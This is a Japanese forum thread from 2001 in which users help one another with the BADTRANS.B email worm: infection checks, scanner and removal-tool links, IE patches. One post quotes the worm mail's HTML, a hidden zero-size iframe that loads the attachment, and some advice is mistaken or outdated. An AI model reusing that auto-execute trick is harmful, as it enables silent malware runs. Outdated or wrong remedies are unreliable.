webメ−ルに登録しろよ!!


153151:01/12/01 21:01 ID:PJsykN+y
>>152
そ、そう・・・?
あまり晒してないつもりなんだが。
154名無しさん@お腹いっぱい。:01/12/01 21:05 ID:L3CY+IMX
KERNELで検索したら、ProgramFilesにある
IKERNELというのがヒットしました。
これってウィルスですか…?
昨日ウィルスが添付されてると思われるメールを
プレビューしてしまいました。
IE5.01SP2使ってるんですがどうなんでしょうか?
155名無しさん@お腹いっぱい。:01/12/01 21:11 ID:eP5BLvZl
sp2でも感染するらしいよ。
156154:01/12/01 21:19 ID:L3CY+IMX
まじですか!?
このKERNELってのはウィルス???
157名無しさん@お腹いっぱい。:01/12/01 21:22 ID:5w8QI8Ri
KERNEL32ならウイルス。

しかし、来るメールの4分の1くらいウイルスつき。
158名無しさん@お腹いっぱい。:01/12/01 21:25 ID:nS8Htd8G
KERNEL32はウィルスじゃないって、うちのシステム部の人が言ってたよ。
拡張子をよく確認すべし。
それが2重拡張子だったら怪しいんでしょ?
もともと入ってるKERNEL32は消しちゃダメだよ。
いろんなシステムで使われるものらしいよ。
159名無しさん@お腹いっぱい。:01/12/01 21:34 ID:jMg5PypQ
>>158
ウィルスが、もともと入ってる kernel32.dll を
書き換えちゃうんだよ。
感染してるかどうかは、アンチウィルスとかでスキャンしないと
わからないけど
160154:01/12/01 21:42 ID:L3CY+IMX
アンチウィルスソフト入れてないんですけど、
チェックする方法ないですか?
161名無しさん@お腹いっぱい..:01/12/01 21:47 ID:uVBkBjR3
ご馳走様でした。
W32/SirCam@MM ウイルスが検知されました。
件名 : c

日付 : Fri, 30 Nov 2001 17:24:43 -0500

添付ファイル : c.vpierre.doc.lnk (210k)
162名無しさん@お腹いっぱい。:01/12/01 21:47 ID:oBUWr25M
>>159
嘘教えたらあかん。
感染ファイルはkernel32.exe。
間違ってkernel32.dll消したらシステムおかしくなるで。
163名無しさん@お腹いっぱい。:01/12/01 21:47 ID:zt7fflEr
こんじょうで。     
164159:01/12/01 21:57 ID:jMg5PypQ
間違いだったらスマソ
HYBRIS とかは "GetModuleHandleA KERNEL32.dll"
つーコードが入ってるから、てっきりdllをいじってるん
だと思ってたよ。

けど、exeって事は実行モジュールなの???
165154:01/12/01 21:59 ID:L3CY+IMX
自分にメール送ってもウィルス付きのメールは
来ないんですけどセーフですか?
166159:01/12/01 22:03 ID:jMg5PypQ
>>165
とりあえず
http://www.trendmicro.co.jp/hcall/scan.htm
で、オンラインスキャンしてみればどーでそ
167154:01/12/01 22:05 ID:L3CY+IMX
早速いってきます。
168154:01/12/01 22:33 ID:L3CY+IMX
ウィルスは検出されませんでした。
どうもお騒がせしました。
169162:01/12/01 22:49 ID:oBUWr25M
>>164
HYBRISのことはようわからん。スマソ。
BADTRANSが作るファイルは以下の3つ
・kernel32.exe(自分自身)
・Cp_25389.nls
・Kdll.dll
でレジストリに、Windows起動時にkernel32.exeが自動実行されるような値を
書き込むらしい。

がいしゅつだが、BADTRANSに関してはやっぱセキュリティ板が詳しいな。
Re:メール受け取ったけど対処の仕方わからん人は行ってみるべし。
ここの1-4あたり読めば何とかなる。
http://pc.2ch.net/test/read.cgi/sec/1007075829/
170age:01/12/01 23:15 ID:Cl7Tgiy7
winは大変だな・・・


171森木拓也:01/12/01 23:17 ID:gMtO+wid
Winは、使うたびにインストールすると良いよ
172名無しさん@お腹いっぱい。:01/12/01 23:35 ID:V0OqZllG
俺は、ウィルスなんか怖くネーよ!

俺のメール先は、本物だからーウィルス送りたかったら

送りなー! 絶対にかかる訳が無いぜ!<笑>

バカどもには負けねーよ!
173 :01/12/01 23:41 ID:GbBDosgo
>>172ウィルスメ−ルも着ないのか・・・
可哀想に・・・
〜〜〜〜〜〜〜合掌〜〜〜〜〜〜〜〜
sageよ




174名無しさん@お腹いっぱい。:01/12/01 23:44 ID:2bsNy4uE
メール開いたら、いきなりMEDIA PLAYER?が開き、あわてて閉じました。
電話線は切っていたのですが、感染してますでしょうか?
175名無しさん@お腹いっぱい。:01/12/01 23:50 ID:BosmbNbF
>>174
メール届いちゃってからなら電話線は関係ない。
176名無しさん@お腹いっぱい。:01/12/02 00:07 ID:KAyH4W2Y
>175
ということは、感染ですね・・・。
電話線切って、1つずつチェックしていったら、なんかいきなりで・・・。
今、私のPCに何が起こってるんでしょうか?
177名無しさん@お腹いっぱい。:01/12/02 00:13 ID:8aeF6r/h
>>176media playerが開いたってゆうのはよくわからない。ゴメソ。
ウィルスじゃないかもよー。
それこそ心配ならオンラインスキャンかけてみなされ。
178名無しさん@お腹いっぱい。:01/12/02 00:16 ID:KAyH4W2Y
>177
ありがとうございます。
何も変化はないので大丈夫かなぁなんて思ってしまいますが、よくわかりません。
オンラインスキャンっていうのもよくわかりませんが、いろいろ見てやってみます。
ありがとう。
179名無しさん@お腹いっぱい。:01/12/02 00:47 ID:HDcrj/N3
>>178
Media Playerが開いたのなら、高確率でウイルスやで。他にも例がある。
詳しくは解らんが、添付されてくるウイルスが音楽ファイルを装う
(拡張子がMP3とか)ことがあるから、Media Playerが開くんとちがうかの。

実際に感染したかどうかはオンラインスキャンで調べてみなされ。
今混んでるみたいなんでうまく繋がらんかもしれんが。
http://housecall.antivirus.com/housecall/start_jp.asp

それから、もしBadtransに感染してても自分のパソコンには特に変化は現れん。
いろんなところにウイルスメールをばら撒くことになるが、Outlookの履歴には残らんから、
送った先から「ゴラァ」メールが届くまで気が付かん。
早めにオンラインスキャンするがよろし。
180150:01/12/02 00:56 ID:TM0OuJfG
152さんありがとうございます。安心しました。。

ところで、きょう一日で、CAEBNECA.EXEっていうファイルが
添付されたメールが2通きたんだけど…
これもなんかヤバイものなんでしょうか?

ここで話題になってるものと関係ないかもなのでさげますね。
181名無しさん@お腹いっぱい。:01/12/02 01:09 ID:xbMy3QmJ
メールのタイトルの頭に(Re)が付いてるもので
尚且つメールのタイトルが文字化けしてるものは
かなり危ないよ。みんな、くれぐれも開かないようね
182名無しさん@お腹いっぱい。:01/12/02 01:12 ID:VG/jQeMQ
WEBメールならファイル開かなきゃ安心・・?
183名無しさん@お腹いっぱい。:01/12/02 01:18 ID:WDQzUYHj
>>182
うん。
即刻削除なさいませ。
184名無しさん@お腹いっぱい。:01/12/02 01:27 ID:owEzNUzy
一日15通ペースですがなにか?
185179:01/12/02 01:50 ID:HDcrj/N3
スマソ。Media Playerが開くことがあるのは、メールのMIMEヘッダで添付ファイルのタイプ
をaudio/x-wavと指定してるかららしい。知ったかぶりはいかんな・・・。(汗

>>184
うちはまだ1通。HPにもメアドさらしてるのに・・・。
186名無しさん@お腹いっぱい。:01/12/02 13:10 ID:F6JXbQS+
俺は、ウィルスなんて、怖くネーよ!
メールアドレス間違えたみたいだな!
[email protected]だぜ!!
俺のアドレスは本物だから、ウィルス送りたかったら送ってみなー!
絶対にかかるわけがナイゼ!<笑> バカには負けねーよ!
187名無しさん@お腹いっぱい。:01/12/02 13:24 ID:saylJRgU
>>185
ただしい。
MIMEが原因で馬鹿IEがファイル実行しちまう。

漏れもあまりに多いから、自分のページのトップからアドレス消した。
最初は親切心でランダムにゴルァしてたけど、もう飽きた。
188名無しさん@お腹いっぱい。:01/12/03 00:30 ID:mrYH6AZ0
189名無しさん@お腹いっぱい。:01/12/03 01:02 ID:0FyG6EkI
>179,185,,,187
ありがとうございます。
そうなんです。勝手に実行(開いた時点で)しちゃったんです。
これは感染したということなんでしょうか?
オンラインスキャンした方がいいのでしょうか?
179さん、度々親切にありがとうございます。
190名無しさん@お腹いっぱい。:01/12/03 01:04 ID:2DmCJ2/A
やられちまった
Meの復元ポイントくわれちってたよ 鬱
191179:01/12/03 02:48 ID:hzIdh/w/
>>189
オンラインスキャンはした方がいいよ。マジで。感染したかどうかは
スキャンしてみないとわからんでの。

で、もしBADTRANSに感染しとったらこれ

☆WORM_BADTRANS.B 修復ツール(トレンドマイクロ)

http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionID=3368

幸い感染してなかったとしても、抜本的対策として、Internet ExplorerのバージョンをSP2
にした方がよいです。そうすればウイルスが自動実行されることだけはなくなる。

☆Internet Explorerのバージョンアップはこちらから

http://microsoft.com/japan/technet/security/current.asp?url=/japan/technet/security/frame_prekb.asp?sec_cd=MS01-020
または
http://windowsupdate.microsoft.com/
192名無しさん@お腹いっぱい。:01/12/03 03:13 ID:261i+lpA
来ませんが、何か?
193コレクター:01/12/03 03:17 ID:iTQwEBIl
ウイルス集めてます。
たくさんのメール、待ってます。
194コレクター:01/12/03 03:19 ID:iTQwEBIl
ウイルス集めてます。
たくさんのメール、待ってます!!
195名無しさん@お腹いっぱい。:01/12/03 03:24 ID:z80KjJoH
昨日のメールはウイルス25通だけでした、と。
さみしー!
196名無しさん@お腹いっぱい。:01/12/03 03:49 ID:uorHB+sx
とうとううちにも来たようですが・・・

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
このメールの添付ファイルはウィルスに感染していました。
The attached file of this mail was infected with the virus.
”message”は”CVDL W95/Badtrans.B”に感染していました。
”message”file was infected with the virus ”CVDL W95/Badtrans.B”.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
ウィルスと一緒に”message”はファイルごと削除されました。
The file ”message”was eliminated with the virus ”CVDL W95/Badtrans.B”.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

<HTML><HEAD></HEAD><BODY bgColor=#ffffff>
<iframe src=cid:EA4DMGBP9p height=0 width=0>
</iframe></BODY></HTML>

これはどういう事なんでしょうか?
当方IE5.5 SP2なのですが、プロバでウイルスをサーバ上で処理するサービスにも登録しています。
大丈夫なのでしょうか?
197名無しさん@お腹いっぱい。:01/12/03 03:58 ID:Z9+D/VT3
>>196
添付ファイルがサーバ上で削除されちゃってるなら大丈夫と思われ。
添付ファイルがウィルスの本体だから。
198名無しさん@お腹いっぱい。:01/12/03 04:14 ID:FMADI27c
>>197
どうもありがとうございます。
駆除ツールで念の為確認したらやはり大丈夫だったようです。
しかしその後>>13にある3つのファイルですが、検索したらKernel32.exeがあったんですけど・・・
199名無しさん@お腹いっぱい。:01/12/03 04:54 ID:Z9+D/VT3
Kernel32.exeはウィルスに感染する前から存在する場合もあるらしい。
バッドトランスの類に感染すると
同名のウィルスの実行ファイルに上書きされてしまうけど。
ウィルスチェックにひっかからないならだいじょーぶと思うけど。
ウィルスバスターなんかだと
ファイル単位でウィルススキャンができるからやってみては
(エクスプローラなんかで
Kernel32.exeの上で右クリック→「ウィルスプロパティ」)。
200名無しさん@お腹いっぱい。:01/12/03 08:08 ID:Z2f2Ox+H
>>198
オンラインスキャンじゃなくて"駆除ツール"使ったんだよね?179に書いてあるやつ?
だったら、再感染防止のためにKernel32.exeっていう"フォルダ"ができているはず。
検索で引っかかったのがフォルダのアイコンだったら放っておいていいよ。

ウイルスは同名のファイルには上書きできるけど、同名の"フォルダ"がある場合には
上書きできないらしい。そういう意味で再感染防止に役立つ。
201名無しさん@お腹いっぱい。:01/12/03 08:22 ID:BbclVQKr
SETUP.DOC.scr ってのが添付されてたよ.
速攻削除したけどこれって何のウィルス?情報キボンヌ

Windowsで拡張子表示してない人はDOCファイルだと思って
開いちゃうから,すぐ広まりそうだね.
202名無しさん@お腹いっぱい。:01/12/03 09:01 ID:IivpW67O
ウチにも10件くらい来たよ、バッドトランスB。
ノートン安置ウィルス入れてたから、検疫できて助かったんだが。

でも、システムスキャンすると、"C:\_RESTORE\TEMP\..."にあるファイルが感染していると言われる。
DOSプロンプトでも消せないし、ウィンドウズでは最初から見れない。
レジストリ見ても異常はなかったし、妙なEXEファイルとかDLLファイルもなかったし。
身に覚えのないメール送信記録もないから、感染していないとは思うんだが…。

ちなみにOSはWindowsMe。
203名無しさん@お腹いっぱい。:01/12/03 10:39 ID:BbclVQKr
>>202
>ウィンドウズでは最初から見れない
隠しファイルもちゃんと表示しましたか?
204PC素人:01/12/03 11:42 ID:kmi1+G1P
[_RESTORE]フォルダよりウイルスが発見される現象ですが、WindowsMeの
機能である「システムの復元」機能によってウイルス感染した状態がバック
アップされてしまっていると思われます。
 WindowsMeではOS自体やアプリケーションの主要なファイルを自動的に
バックアップしています。この機能によってウイルス感染した状態のバック
アップ(WindowsMeでは「復元ポイント」と呼びます)が作成されてしまった
場合、バックアップファイル内からのウイルス駆除やバックアップファイル
自体の削除はできません。そのため、繰り返し発見される状態になってしまいます。
 ウイルスが感染したファイルを含むバックアップを保持していることは
セキュリティ上望ましいことではありませんのでバックアップを一旦破棄し、
ウイルスを完全に駆除した状態でバックアップを作成しなおすことをお勧めいたしま
す。


●バックアップを全て破棄する方法


@[コントロールパネル]-[システム]-「パフォーマンス」タブから
「ファイルのシステム」を選択します。


A「ファイルシステムのプロパティ」画面から「トラブルシューティング」
タブを選択し、「システムを復元しない」のチェックボックスにチェックします。
 Windowsを再起動します。

※ 上記の設定を行うとシステムの復元機能が無効となってます。
システムの復元機能を使用する場合は同様の手順でチェックボックス
のチェックを外しておきます。
205名無しさん@お腹いっぱい。:01/12/03 12:15 ID:2tTUaKIc
オンラインスキャンってどうやってするんですか?
>>179のリンク先に行ってみたけどその先どうしたらいいか分かりません。
厨房質問スマソ
206:01/12/03 14:12 ID:80gMHaIN
"駆除ツール"を、使うとKernel32.exeって、ホルダーはあるが
中身はからっぽだよねえ。だよねえ・・・
207198:01/12/03 15:08 ID:mIGK11pn
>>200
はい。オンラインスキャン(>>179のリンク先)ではなく、
駆除ツール(FixBadtr.exeと3368Fix_BADT.EXE)を使いました。
WINDOWSのSYSTEMディレクトリに検索で引っかかったKernel32exeですが、
”ファイル”ではなく、”フォルダ”でした。
サイズも0バイトで、ファイル数も0(つまり空フォルダ)です。
その後>>179のオンラインスキャンもしてみました。
一応、大丈夫なようです。
対策としては、SP2のセキュリティーホールのパッチと、OEのメールを
プレビューしないという設定にしましたが、これで大丈夫ですか?
ノートンとか、ウイルスバスターとかも購入しておいた方がいいんですかね?
208 :01/12/03 16:42 ID:67Ui7Pu1
 ちょっとお聞きしたいんですけど、WEBメールで送った過去のメールが他の人に再送されてしまいます。これはウィルスによるのでしょうか??
 あと、知り合いの過去のメールもバンバン送られてくるんですけど、そのヘッダと、僕の再送されるWEBメールのヘッダを見比べると、まったく同じ経路で送られているみたいなんです。これって、何か関係あるんでしょうか。ハッキングでしょうか??
209名無しさん@お腹いっぱい。:01/12/03 16:45 ID:JXLtDQjV
ルドルフ最強
210200:01/12/03 19:51 ID:5AfYMl2c
>>201
BADTRANS。
詳細はトレンドマイクロのページ参照。
http://inet.trendmicro.co.jp/virusinfo/isp/default3.asp?VName=WORM_BADTRANS.B
IEのバッチ当ててないと見るだけでも感染するぞい。
211200:01/12/03 19:56 ID:5AfYMl2c
>>205
別スレの4参照
「猛威をふるう BADTRANS.B Re: メール (2通目) 」
http://pc.2ch.net/test/read.cgi/sec/1007075829/4
212名無しさん@お腹いっぱい。:01/12/03 19:59 ID:QpNtADqH
最近勝手にメディアプレイヤーが起動するメール来るんだけど詳細キボンヌ
213201:01/12/03 20:08 ID:BbclVQKr
>>210
ありがとう.
IE6のバッチ当てたのに,まだ
http://www.sapporoworks.ne.jp/secure/

http://www.sapporoworks.ne.jp/secure/003/index.html
でMedia Playerが立ち上がるよ.困ったなあ.

ちなみにメーラーは鶴亀とかかめ〜るだけど,それでも危ない?
214200:01/12/03 20:10 ID:5AfYMl2c
>>207
OKと思われます。感染してなくてよかったですね。
ウイルスソフトは入れるにこしたことはないでしょう。
プロバのウイルスチェックサービス入ってるとのことだから、
感染の危険性は低いと思いますが念のため。
とか言いながら自分は入れてなかったりする・・・(w
215教えて君でごめんなさい:01/12/03 20:21 ID:9LOo4TlK
うちも来ました。ウイルスメール。んで削除の時に開いちゃいました。
でも感染している様子なし。
いちおうトレンドマイクロでオンラインスキャンしてみたけど
「ウイルスは検出しませんでした」とか言われた。
ちなみにうちはWindowsMeでOutlookExpressのバージョン5。
バージョン5.05と5.15?がヤバイって聞いたから
バージョン5だと大丈夫なのかな?
216名無しさん@お腹いっぱい。:01/12/03 20:28 ID:BbclVQKr
>>215
「WORM_BADTRANS.B」はウイルスコードのバグのためか不完全な
メールを送信してしまい、結果的にワームの脅威のないメールが
届く場合があることが確認されています。「WORM_BADTRANS.B」て
は添付ファイルが壊れた状態で届き、実行できません。この状態
のメールに関してはワームの脅威がないのでウイルス対策製品で
は検出されません。いずれにいたしましてもワームの危険性があ
るメールをすべて削除していただくようお願いします。

以上,ここ↓からコピペです.
http://www.trendmicro.co.jp/virusinfo/worm_badtrans_b.htm
217教えて君でごめんなさい:01/12/03 20:34 ID:9LOo4TlK
>>216
ありがとうっ
218200:01/12/03 21:52 ID:5AfYMl2c
>>208
断言はできませんが、お知り合いがウイルスに感染したのでは?
ウイルスの中には、Outlookの受信トレイに保存されているメッセージをチェックして
本文やタイトルはそのままに、自分(ウイルス)をつけて勝手に返信しまくるものが
あります。1年程前に流行ったW32.Navidadなどがその例ですね。
そのメールには変な添付ファイルついてませんでしたか?

後、考えられるのはメールサーバの障害かな。
会社での話ですが、以前取引先から突然過去のメールがバンバン届きだして
ビックリしたことがありました。
情報が少ないので自分にはこれくらいしか答えられません。スマソ。
219200:01/12/03 22:26 ID:5AfYMl2c
>>212
ウイルス。
>>213
何でだろ???
IE6は標準かフルインストールしましたよね?

ちなみにOutlook以外のメーラーですが、HTMLメールの表示をするのに
IEのコンポーネントを利用してることがあるため、今回のBadtransのような
IEのセキュリィホールをつくタイプのウイルスの影響を受けることが
あります。Outlookでないからと安心しない方がいいでしょう。
詳しくはメールソフトの作者さんに確認してくださいね。
220200:01/12/03 22:38 ID:5AfYMl2c
さて、別スレの情報が大変充実してきてるみたいです。
「BADTRANSに感染しちゃったかもオロオロ・・・」という人はまずこちらを
読んでみてくださいね。特に1-9。

☆猛威をふるう BADTRANS.B Re: メール (3通目)in セキュリティ板
http://pc.2ch.net/test/read.cgi/sec/1007344514/

自分は落ちます・・・
221208:01/12/04 03:58 ID:46gckNNw
 はい、その人からの、本文とタイトルがついているメールには添付ファイルはありません。
 それとは別に、件名REで本文無しの40Kb添付ファイルつきのやつも届きます。これは間違い
なくBADTRANSだと思うんですが…。

>ウイルスの中には、Outlookの受信トレイに保存されているメッセージをチェックして
>本文やタイトルはそのままに、自分(ウイルス)をつけて勝手に返信しまくるものが
>あります。1年程前に流行ったW32.Navidadなどがその例ですね。
 この場合、差出人は誰になるのでしょうか。最初にそのメールを書いた人でしょうか、
それとも、ウィルスに犯された状態でそれを受信し、そのメールをばらまいた人でしょう
か??
 ちなみに、私の過去のメールも、その人の過去のメールも、同じサーバーを経由してきてい
て、普段正常にメールのやり取りをしているのとは違う経路です(私→友人と友人→私の経路
も違います)。
 WEBメールのサーバーに問い合わせてみましたが、「サーバーがウィルスに犯されることは基
本的にありません」とのことでした。
222またまた来ました:01/12/04 14:49 ID:TVCuXlAW
しばらく来ないから、もう沈静化したのかと思ったら来てました。
WEBメールからわざとアウトルックに落としたら、即時隔離。
From: "リコ・" <*********@d6.dion.ne.jp>
Subject: Re:  ファイル名 Me_nude.M.scr
WORM_BADTRANS.B でした。ヌードってのはそそられますです。
223201:01/12/04 16:22 ID:fnAHsv24
200さんいろいろありがとうございます.
スレ両方チェックするのも大変なので
200さん推奨のこちら↓に集団移住しませんか?

☆猛威をふるう BADTRANS.B Re: メール (3通目)in セキュリティ板
http://pc.2ch.net/test/read.cgi/sec/1007344514/
224201:01/12/04 16:23 ID:fnAHsv24
sage忘れた.欝だ
225名無しさん@お腹いっぱい。:01/12/04 21:39 ID:tc+w2DQr
BADTRANS.Bメール累計200通突破!
226200:01/12/04 21:40 ID:ZPKQsl+V
sageってこうやるのか?2CH初心者なんでよくわからん(w

201さん誘導ありがとう。そろそろボロが出そうになってたんで助かりましたです。
208さん中途半端な回答になってしまってスマソ。自分はネットワーク詳しくないんで
これ以上は答えられそうにないっす。セキュリティ板あたりで適当なスレ見つけて
聞いてもらった方が的確な回答が得られるかも。早く解決するといいですね、って無責任か?
227名無しさん@お腹いっぱい。:01/12/04 23:09 ID:A+8dcna5
>>223
そこすごくためになりますよね。
228228:01/12/05 12:20 ID:ebsvy4+D
昨日、感染したから駆除したんだけど…その後ちょっとおかしくなったようで…。
なんか知らんが、楽天市場等のメールを開き、文書内のURLを開こうとした所、
開けない!他のお店からのやつなんかのメールマガジン等も同様です。
エクスプローラでCドライブが開いてしまいます。
これはメール内のURLだけの現象です。誰か原因わかりませんか?
229 :01/12/05 12:29 ID:VB6WC7e4
お陰様で私のスレ229まで行きました。自己記録2番目です。ありがとうございました(涙)
230名無しさん@お腹いっぱい。:01/12/05 21:40 ID:Kwb1Ruei
age
231名無しさん@お腹いっぱい。:01/12/05 23:54 ID:kxm4VH76
>>228
IEイヤになってNetscape入れたでしょ?
ほれ!

「メールのURLクリックでCドライブ表示?」
http://pcgaz.nikkeibp.co.jp/qa/helpc/15.shtml
232228
>231

もとからはいってたので入れてないです。
でも、昨日5から5.5にバーゾンうpしてみたら、直りました
どうもありがとうございました。